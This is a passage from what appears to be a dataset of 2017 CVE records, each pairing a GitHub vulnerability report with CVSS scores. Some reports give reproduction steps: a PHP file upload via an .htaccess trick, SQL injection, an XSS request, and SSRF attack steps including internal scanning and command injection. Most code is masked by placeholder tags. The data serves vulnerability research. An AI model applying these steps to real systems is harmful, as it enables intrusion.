started. As for the fix, I would entirely eliminate the ability to change the value of APITAG and APITAG at runtime, since there is no safe way for you to fix the permissions after it is changed. Once those variables are eliminated, you don't need to call chown on the directories or files: the directories can be created with the correct ownership by make install , and the files will be owned by the user who creates them (namely the icinga runtime user, who will be the one writing to them, and that user will never change). If you would rather keep those variables, just let the init/service script crash if the permissions are wrong. Users will have to be responsible for fixing the existing permissions if they make a major change like switching an in use UID/GID on a live system. APITAG is not mere sadism on my part; there really is no safe way to automate the necessary changes.) This affects both the init script and systemd service file: URLTAG URLTAG",
  10825. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10826. "severity": "HIGH",
  10827. "baseScore": 7.0,
  10828. "impactScore": 5.9,
  10829. "exploitabilityScore": 1.0
  10830. },
  10831. {
  10832. "CVE_ID": "CVE-2017-16941",
  10833. "Issue_Url_old": "https://github.com/octobercms/october/issues/3257",
  10834. "Issue_Url_new": "https://github.com/octobercms/october/issues/3257",
  10835. "Repo_new": "octobercms/october",
  10836. "Issue_Created_At": "2017-11-22T11:57:17Z",
  10837. "description": "Octobercms left an arbitrary upload vulnerability in the latest version.. Expected behavior Well, dear sir, I just found an arbitrary upload vulnerability in Octobercms of the latest version. Reproduce steps When you login into the backend, you can visit\uff1a APITAG You can get the demo zip by export from demo theme, and now you have a zip file of demo. Then you can add two file into the zip file\uff0cone evil php file and one .htaccess file. .htaccess CODETAG FILETAG APITAG Now, I should upload the modified zip file , and import to cover the original demo theme folder. When I upload successful, I'll get an evil file here . Because of the new .htaccess file, I can visit the FILETAG file directly now, I can see the php infomation of the server. APITAG October build The latest version. Wish your response ,sir!",
  10838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10839. "severity": "HIGH",
  10840. "baseScore": 8.8,
  10841. "impactScore": 5.9,
  10842. "exploitabilityScore": 2.8
  10843. },
  10844. {
  10845. "CVE_ID": "CVE-2017-16942",
  10846. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/341",
  10847. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/341",
  10848. "Repo_new": "libsndfile/libsndfile",
  10849. "Issue_Created_At": "2017-11-25T07:55:51Z",
  10850. "description": "a div zero vul in function APITAG in libsndfile NUMBERTAG ubuntu NUMBERTAG source package in Ubuntu. PATHTAG gdb ./aubiomfcc GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i PATHTAG Starting program: PATHTAG i PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGFPE, Arithmetic exception NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG bytespersec = (wav_fmt APITAG wav_fmt APITAG / wav_fmt APITAG ; (gdb) bt NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ca NUMBERTAG in wav_read_header ( framesperblock=<synthetic pointer>, blockalign=<synthetic pointer>, psf NUMBERTAG f0) at APITAG NUMBERTAG wav_open (psf=psf APITAG at APITAG NUMBERTAG ffff NUMBERTAG f4 in psf_open_file (psf NUMBERTAG f0, APITAG at APITAG NUMBERTAG ffff NUMBERTAG e0 in sf_open ( path=path APITAG \"hfl crash NUMBERTAG APITAG mode=mode APITAG APITAG at APITAG NUMBERTAG dc in new_aubio_source_sndfile ( APITAG \"hfl crash NUMBERTAG APITAG APITAG hop_size=hop_size APITAG at PATHTAG NUMBERTAG ERRORTAG a NUMBERTAG in new_aubio_source ( uri NUMBERTAG fffffffe NUMBERTAG hfl crash NUMBERTAG APITAG samplerate NUMBERTAG hop_size NUMBERTAG at PATHTAG NUMBERTAG in examples_common_init NUMBERTAG af in main () (gdb NUMBERTAG i $pc NUMBERTAG ffff NUMBERTAG aaab APITAG div %r9d NUMBERTAG ffff NUMBERTAG aaae APITAG cmp %edi,%ea NUMBERTAG ffff NUMBERTAG aab0 APITAG mov %eax,%ec NUMBERTAG ffff NUMBERTAG aab2 APITAG je NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG (gdb) i r ra NUMBERTAG f NUMBERTAG rb NUMBERTAG f NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe0f NUMBERTAG fffffffe0f0 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG aaab NUMBERTAG ffff NUMBERTAG aaab APITAG eflags NUMBERTAG PF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG Type APITAG to continue, or q APITAG to quit",
  10851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10852. "severity": "MEDIUM",
  10853. "baseScore": 6.5,
  10854. "impactScore": 3.6,
  10855. "exploitabilityScore": 2.8
  10856. },
  10857. {
  10858. "CVE_ID": "CVE-2017-16961",
  10859. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/323",
  10860. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/323",
  10861. "Repo_new": "bigtreecms/bigtree-cms",
  10862. "Issue_Created_At": "2017-11-22T08:49:39Z",
  10863. "description": "SQL injection in APITAG CMS NUMBERTAG SQL injection in APITAG CMS NUMBERTAG APITAG day. >I found a SQL injection vulnerability in APITAG CMS through APITAG vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. file in PATHTAG ERRORTAG values of the temp_tags parameters are not sanitized; and it is taken out of the database. so ,We can insert an attack statement into the table \uff0cthen access this point to complete the attack chain Poc: at first, add a trees ERRORTAG FILETAG if there are any questions, please send me the details to my email at EMAILTAG",
  10864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10865. "severity": "MEDIUM",
  10866. "baseScore": 6.5,
  10867. "impactScore": 3.6,
  10868. "exploitabilityScore": 2.8
  10869. },
  10870. {
  10871. "CVE_ID": "CVE-2017-17054",
  10872. "Issue_Url_old": "https://github.com/aubio/aubio/issues/148",
  10873. "Issue_Url_new": "https://github.com/aubio/aubio/issues/148",
  10874. "Repo_new": "aubio/aubio",
  10875. "Issue_Created_At": "2017-11-28T06:12:00Z",
  10876. "description": "a div zero vul in function APITAG in APITAG PATHTAG gdb ./aubioquiet GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i APITAG Starting program: PATHTAG i APITAG FILETAG",
  10877. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10878. "severity": "MEDIUM",
  10879. "baseScore": 5.5,
  10880. "impactScore": 3.6,
  10881. "exploitabilityScore": 1.8
  10882. },
  10883. {
  10884. "CVE_ID": "CVE-2017-17058",
  10885. "Issue_Url_old": "https://github.com/woocommerce/woocommerce/issues/17964",
  10886. "Issue_Url_new": "https://github.com/woocommerce/woocommerce/issues/17964",
  10887. "Repo_new": "woocommerce/woocommerce",
  10888. "Issue_Created_At": "2017-11-30T03:07:37Z",
  10889. "description": "Does WC have a directory transversal vulnerability? . Hi there! A user brings this to our attention: URLTAG > The APITAG plugin through NUMBERTAG for APITAG has a Directory Traversal Vulnerability via a PATHTAG URI, which accesses a parent directory. Allegedly, \" When you dork with this,it will generate juciy information in parent directory , for best practice filter according to the country URLTAG .\"",
  10890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10891. "severity": "HIGH",
  10892. "baseScore": 7.5,
  10893. "impactScore": 3.6,
  10894. "exploitabilityScore": 3.9
  10895. },
  10896. {
  10897. "CVE_ID": "CVE-2017-17059",
  10898. "Issue_Url_old": "https://github.com/NaturalIntelligence/wp-thumb-post/issues/1",
  10899. "Issue_Url_new": "https://github.com/naturalintelligence/wp-thumb-post/issues/1",
  10900. "Repo_new": "naturalintelligence/wp-thumb-post",
  10901. "Issue_Created_At": "2017-11-23T08:21:21Z",
  10902. "description": "APITAG APITAG NUMBERTAG Cross Site Scripting. The XSS reflected because the values are not filter correctly: APITAG Line NUMBERTAG APITAG \"> APITAG Line NUMBERTAG APITAG \"> [POC] POST PATHTAG (\"XSS\") APITAG NUMBERTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Upgrade Insecure Requests NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Encoding: gzip, deflate, br Accept Language: es ES,es;q NUMBERTAG Cookie: Connection: close Content Type: application/x www form urlencoded Content Length NUMBERTAG amty_hidden NUMBERTAG",
  10903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10904. "severity": "MEDIUM",
  10905. "baseScore": 6.1,
  10906. "impactScore": 2.7,
  10907. "exploitabilityScore": 2.8
  10908. },
  10909. {
  10910. "CVE_ID": "CVE-2017-17102",
  10911. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/9",
  10912. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/9",
  10913. "Repo_new": "fiyocms/fiyocms",
  10914. "Issue_Created_At": "2017-12-03T08:14:32Z",
  10915. "description": "SQL injection in APITAG NUMBERTAG Good day. I found a SQL injection vulnerability in APITAG APITAG vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. There is no need to login in when exploiting this vulnerability File location: FILETAG CODETAG Noticed that the function check_permalink Put the parameters $_REQUEST['link'] into the database query without filtered file: FILETAG ERRORTAG POC:",
  10916. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10917. "severity": "HIGH",
  10918. "baseScore": 7.5,
  10919. "impactScore": 3.6,
  10920. "exploitabilityScore": 3.9
  10921. },
  10922. {
  10923. "CVE_ID": "CVE-2017-17103",
  10924. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/10",
  10925. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/10",
  10926. "Repo_new": "fiyocms/fiyocms",
  10927. "Issue_Created_At": "2017-12-03T13:35:20Z",
  10928. "description": "an update SQL injection in APITAG NUMBERTAG Good day. I found an update type of SQL injection vulnerability in the APITAG APITAG vulnerability can lead to normal user privileges elevated to administrator privileges. the vulnerability lies in PATHTAG CODETAG it can be noticed that these two parameters $_POST FILETAG poc CODETAG FILETAG",
  10929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10930. "severity": "HIGH",
  10931. "baseScore": 8.8,
  10932. "impactScore": 5.9,
  10933. "exploitabilityScore": 2.8
  10934. },
  10935. {
  10936. "CVE_ID": "CVE-2017-17104",
  10937. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/11",
  10938. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/11",
  10939. "Repo_new": "fiyocms/fiyocms",
  10940. "Issue_Created_At": "2017-12-03T14:42:32Z",
  10941. "description": "any file read vulnerability in APITAG NUMBERTAG Hi, I found an arbitrary file read vulnerability in APITAG NUMBERTAG It may cause the leakage of sensitive information. files in : PATHTAG CODETAG it can be noticed that $file is stitched together by $ _GET FILETAG",
  10942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10943. "severity": "HIGH",
  10944. "baseScore": 7.5,
  10945. "impactScore": 3.6,
  10946. "exploitabilityScore": 3.9
  10947. },
  10948. {
  10949. "CVE_ID": "CVE-2017-17439",
  10950. "Issue_Url_old": "https://github.com/heimdal/heimdal/issues/353",
  10951. "Issue_Url_new": "https://github.com/heimdal/heimdal/issues/353",
  10952. "Repo_new": "heimdal/heimdal",
  10953. "Issue_Created_At": "2017-12-05T11:47:32Z",
  10954. "description": "Remote unauthenticated APITAG in Heimdal KDC NUMBERTAG The following was reported in the Debian bug tracker at CVETAG heimdal kdc NUMBERTAG is regularly observed to crash due to malformed client names in client requests received over the internet. APITAG This leads to a segfault: ERRORTAG The related code is in PATHTAG APITAG Proposed patch: APITAG It would be good to have this fix, or another one, approved quickly so we can get a patch in Debian's security release.",
  10955. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10956. "severity": "HIGH",
  10957. "baseScore": 7.5,
  10958. "impactScore": 3.6,
  10959. "exploitabilityScore": 3.9
  10960. },
  10961. {
  10962. "CVE_ID": "CVE-2017-17479",
  10963. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1044",
  10964. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1044",
  10965. "Repo_new": "uclouvain/openjpeg",
  10966. "Issue_Created_At": "2017-12-08T07:29:36Z",
  10967. "description": "Similar vulnerable functions related to CVETAG . There are two functions similar to vulnerable function with id CVETAG CVETAG url with issue id NUMBERTAG Below is the patch for CVETAG . URLTAG URLTAG FILETAG Below are two functions that similar to the vulnerable function NUMBERTAG PATHTAG (pgxtovolume) ERRORTAG FILETAG NUMBERTAG PATHTAG (pgxtoimage) ERRORTAG FILETAG I think there are vulnerabilities in those two functions, too. Therefore, there should be patches for those two functions.",
  10968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10969. "severity": "CRITICAL",
  10970. "baseScore": 9.8,
  10971. "impactScore": 5.9,
  10972. "exploitabilityScore": 3.9
  10973. },
  10974. {
  10975. "CVE_ID": "CVE-2017-17484",
  10976. "Issue_Url_old": "https://github.com/znc/znc/issues/1459",
  10977. "Issue_Url_new": "https://github.com/znc/znc/issues/1459",
  10978. "Repo_new": "znc/znc",
  10979. "Issue_Created_At": "2017-11-21T10:48:01Z",
  10980. "description": "\"stack smashing\" segmentation fault with znc git on arm NUMBERTAG h. I'm running znc git from the AUR on my ODROID XU4, running Arch Linux ARM, after adding arm NUMBERTAG h to the architecture field. Things were fine until I decided to update/rebuild yesterday. After between NUMBERTAG m NUMBERTAG h of being online, the service suddently stops. ERRORTAG Since this kept happening, I rebuilt the package again with debug symbols and have posted below the coredump. systemd coredump URLTAG I would report this in IRC, but none of my clients are set up for direct connection, only through my ZNC session. If there's any additional info which would be helpful, please just ask; I'll be more than happy to generate/provide it.",
  10981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10982. "severity": "CRITICAL",
  10983. "baseScore": 9.8,
  10984. "impactScore": 5.9,
  10985. "exploitabilityScore": 3.9
  10986. },
  10987. {
  10988. "CVE_ID": "CVE-2017-17485",
  10989. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1855",
  10990. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1855",
  10991. "Repo_new": "fasterxml/jackson-databind",
  10992. "Issue_Created_At": "2017-12-12T06:24:38Z",
  10993. "description": "Placeholder for continuing serialization gadget fixing. Placeholder for further inclusions, to be included in NUMBERTAG",
  10994. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10995. "severity": "CRITICAL",
  10996. "baseScore": 9.8,
  10997. "impactScore": 5.9,
  10998. "exploitabilityScore": 3.9
  10999. },
  11000. {
  11001. "CVE_ID": "CVE-2017-17497",
  11002. "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/656",
  11003. "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/656",
  11004. "Repo_new": "htacg/tidy-html5",
  11005. "Issue_Created_At": "2017-12-09T05:48:31Z",
  11006. "description": "Segmentation Fault. Description The vulnerability is an incorrect access control. The variable APITAG at line NUMBERTAG in clean.c) is modified in the loop, but it does not check whether the new value is valid. When you enter the loop again, APITAG > next\u201dis invalid. So it causes the segmentation fault . Version APITAG Backtrace: CODETAG GDB Information CODETAG APITAG Contact me if you need Poc file at APITAG or APITAG",
  11007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11008. "severity": "HIGH",
  11009. "baseScore": 7.5,
  11010. "impactScore": 3.6,
  11011. "exploitabilityScore": 3.9
  11012. },
  11013. {
  11014. "CVE_ID": "CVE-2017-17504",
  11015. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/872",
  11016. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/872",
  11017. "Repo_new": "imagemagick/imagemagick",
  11018. "Issue_Created_At": "2017-11-21T05:39:48Z",
  11019. "description": "heap buffer overflow in Magick_png_read_raw_profile. $ convert version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg pangocairo png x xml zlib commit: APITAG compile at ubuntu NUMBERTAG Trigger Command: convert Magick_png_read_raw_profile heap overflow /dev/null ERRORTAG testcase: URLTAG",
  11020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11021. "severity": "MEDIUM",
  11022. "baseScore": 6.5,
  11023. "impactScore": 3.6,
  11024. "exploitabilityScore": 2.8
  11025. },
  11026. {
  11027. "CVE_ID": "CVE-2017-17562",
  11028. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/249",
  11029. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/249",
  11030. "Repo_new": "embedthis/goahead",
  11031. "Issue_Created_At": "2017-06-09T19:11:15Z",
  11032. "description": "CGI environment variables need a prefix. CGI variables from request queries and from POST data are passed to CGI programs. These variables correspond to the user parameters. There needs to be a prefix applied to avoid clashing with standard environment variables.",
  11033. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11034. "severity": "HIGH",
  11035. "baseScore": 8.1,
  11036. "impactScore": 5.9,
  11037. "exploitabilityScore": 2.2
  11038. },
  11039. {
  11040. "CVE_ID": "CVE-2017-17665",
  11041. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4073",
  11042. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4073",
  11043. "Repo_new": "octopusdeploy/issues",
  11044. "Issue_Created_At": "2017-12-13T05:23:03Z",
  11045. "description": "Machine update process doesn't check that the user has access to all environments. When an authenticated user has access to an environment that a machine is scoped to they can escalate that access by adding more environments that they have access to to that scope.",
  11046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11047. "severity": "HIGH",
  11048. "baseScore": 8.8,
  11049. "impactScore": 5.9,
  11050. "exploitabilityScore": 2.8
  11051. },
  11052. {
  11053. "CVE_ID": "CVE-2017-17669",
  11054. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/187",
  11055. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/187",
  11056. "Repo_new": "exiv2/exiv2",
  11057. "Issue_Created_At": "2017-12-10T07:21:36Z",
  11058. "description": "heap buffer overflow in APITAG Description There is a heap buffer overflow vulnerability in Exi NUMBERTAG The command is: ./exi NUMBERTAG POC Stack trace with asan: ERRORTAG Author Credit to Young_X MENTIONTAG IIE",
  11059. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11060. "severity": "MEDIUM",
  11061. "baseScore": 5.5,
  11062. "impactScore": 3.6,
  11063. "exploitabilityScore": 1.8
  11064. },
  11065. {
  11066. "CVE_ID": "CVE-2017-17680",
  11067. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/873",
  11068. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/873",
  11069. "Repo_new": "imagemagick/imagemagick",
  11070. "Issue_Created_At": "2017-11-22T08:24:45Z",
  11071. "description": "memory leak in APITAG memory. $ magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jpeg lzma pangocairo png tiff x xml zlib Trigger Command: magick APITAG memory leak /dev/null ERRORTAG testcase: URLTAG",
  11072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11073. "severity": "MEDIUM",
  11074. "baseScore": 6.5,
  11075. "impactScore": 3.6,
  11076. "exploitabilityScore": 2.8
  11077. },
  11078. {
  11079. "CVE_ID": "CVE-2017-17681",
  11080. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/869",
  11081. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/869",
  11082. "Repo_new": "imagemagick/imagemagick",
  11083. "Issue_Created_At": "2017-11-20T02:12:03Z",
  11084. "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug we found a infinite loop in the following code (coders/psd.c). APITAG is always NUMBERTAG CODETAG testcase: URLTAG",
  11085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11086. "severity": "MEDIUM",
  11087. "baseScore": 6.5,
  11088. "impactScore": 3.6,
  11089. "exploitabilityScore": 2.8
  11090. },
  11091. {
  11092. "CVE_ID": "CVE-2017-17682",
  11093. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/870",
  11094. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/870",
  11095. "Repo_new": "imagemagick/imagemagick",
  11096. "Issue_Created_At": "2017-11-20T02:37:26Z",
  11097. "description": "cpu exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG When debug we found a very large number in APITAG ERRORTAG testcase: URLTAG",
  11098. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11099. "severity": "MEDIUM",
  11100. "baseScore": 6.5,
  11101. "impactScore": 3.6,
  11102. "exploitabilityScore": 2.8
  11103. },
  11104. {
  11105. "CVE_ID": "CVE-2017-17697",
  11106. "Issue_Url_old": "https://github.com/vmware/harbor/issues/3755",
  11107. "Issue_Url_new": "https://github.com/goharbor/harbor/issues/3755",
  11108. "Repo_new": "goharbor/harbor",
  11109. "Issue_Created_At": "2017-12-07T09:51:21Z",
  11110. "description": "There is a SSRF security vulnerability. hello developers, there is a security vulnerability in file PATHTAG in APITAG function, in endpoint parameter\uff0cresult in a SSRF . SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet The last place to send a request at file PATHTAG APITAG function ERRORTAG Send the request is as follows\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > Connection: keep alive > Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded > Referer: URLTAG > Accept Encoding: gzip, deflate, br > Accept Language: zh CN,zh;q NUMBERTAG Cookie: language=zh CN; APITAG > > APITAG Send the request, the server will request URLTAG the port NUMBERTAG open or not open then Return different content, And lead to information disclosure FILETAG FILETAG APITAG \u00a0\u00a0attack\u00a0\u00a0steps NUMBERTAG Scan internal network to determine internal infrastructure which you may access NUMBERTAG Collect opened ports at localhost and other internal hosts which you want (basically by time\u00adbased determination NUMBERTAG Determine services/daemons on ports using wiki or daemons banners (if you may watch output NUMBERTAG Determine type of you SSRF combination: \u25cb Direct socket access (such as this example) \u25cb Sockets client (such as java URI, cURL, LWP, others NUMBERTAG In case of direct socket access determine CRLF and other injections for smuggling NUMBERTAG In case of sockets client, determine available URI schemas NUMBERTAG Compare available schemas and services/daemons protocols to find smuggling possibilities NUMBERTAG Determine host\u00adbased auth daemons and try to exploit it if there is a remote command execution vulnerability of the host in internal network\uff0cWe can use this vulnerability into Intranet\uff0cexample\uff1a > URLTAG the host in intranet will execute the command $( PATHTAG ) Vulnerability of SSRF bible Cheatsheet\uff1a FILETAG",
  11111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  11112. "severity": "HIGH",
  11113. "baseScore": 8.6,
  11114. "impactScore": 4.0,
  11115. "exploitabilityScore": 3.9
  11116. },
  11117. {
  11118. "CVE_ID": "CVE-2017-17718",
  11119. "Issue_Url_old": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
  11120. "Issue_Url_new": "https://github.com/ruby-ldap/ruby-net-ldap/issues/258",
  11121. "Repo_new": "ruby-ldap/ruby-net-ldap",
  11122. "Issue_Created_At": "2016-01-14T16:19:29Z",
  11123. "description": "LDAPS vulnerable to MITM failure to validate hostname against CN or SAN in NUMBERTAG Cert. There are noted TLS/SSL limitations in the documented parts of the code and the info about encryption URLTAG . Technically, TLS/SSL also provides the ability to authenticate servers by matching the hostname to a CN (common name) or a (SAN) Subject Alternative Name and from what I've seen, while net ldap notes the certificate and trust chain limitations and insecure default, but it doesn't note the extra step needed to get to proper LDAP server authentication via LDAPS. CODETAG The above advice is not sufficient. It only assures that a server has a valid cert which was signed by a trusted CA, but it does not provide proof that it's the correct server E.g. APITAG could with a cert issued as APITAG could still impersonate APITAG to steal credentials. In addition to the above suggtestion setting a more secure and sane TLS/SSL context that validates certs , the net ldap lib should also, probably by default, add and make use of verify_certificate_identity URLTAG . I've browsed FILETAG and don't see anything that checks the hostname (FQDN) is authenticated against the certficate. ERRORTAG Given ruby essentially 'wraps' APITAG this Hostname_validation URLTAG reference also highlights the issue, with a choice extract > One common mistake made by users of APITAG is to assume that APITAG will validate the hostname in the server's certificate. Versions prior to NUMBERTAG did not perform hostname validation. Version NUMBERTAG and up contain support for hostname validation, but they still require the user to call a few functions to set it up.",
  11124. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  11125. "severity": "MEDIUM",
  11126. "baseScore": 5.9,
  11127. "impactScore": 3.6,
  11128. "exploitabilityScore": 2.2
  11129. },
  11130. {
  11131. "CVE_ID": "CVE-2017-17724",
  11132. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/263",
  11133. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/263",
  11134. "Repo_new": "exiv2/exiv2",
  11135. "Issue_Created_At": "2018-04-04T08:16:47Z",
  11136. "description": "out bound reads which could result to segmentfault. there are other testcases to trigger out of bound read with the commands (exi NUMBERTAG pv $POC), some debug information as follows: exi NUMBERTAG pv $POC Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG e RB NUMBERTAG ffff NUMBERTAG a2ed NUMBERTAG e2e2e ('...') RC NUMBERTAG RD NUMBERTAG f1fe RSI NUMBERTAG ffffffff RDI NUMBERTAG RBP NUMBERTAG fffffff2ce NUMBERTAG fffffff2ec NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG RSP NUMBERTAG fffffff2c NUMBERTAG ff7fe NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG movzx eax,BYTE PTR [rax]) R NUMBERTAG R NUMBERTAG fe NUMBERTAG R NUMBERTAG ffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff NUMBERTAG a2ac NUMBERTAG ASCII') R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov edx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG c NUMBERTAG b APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG mov rax,QWORD PTR [rbp NUMBERTAG b NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int NUMBERTAG add rax,rd NUMBERTAG ffff NUMBERTAG c 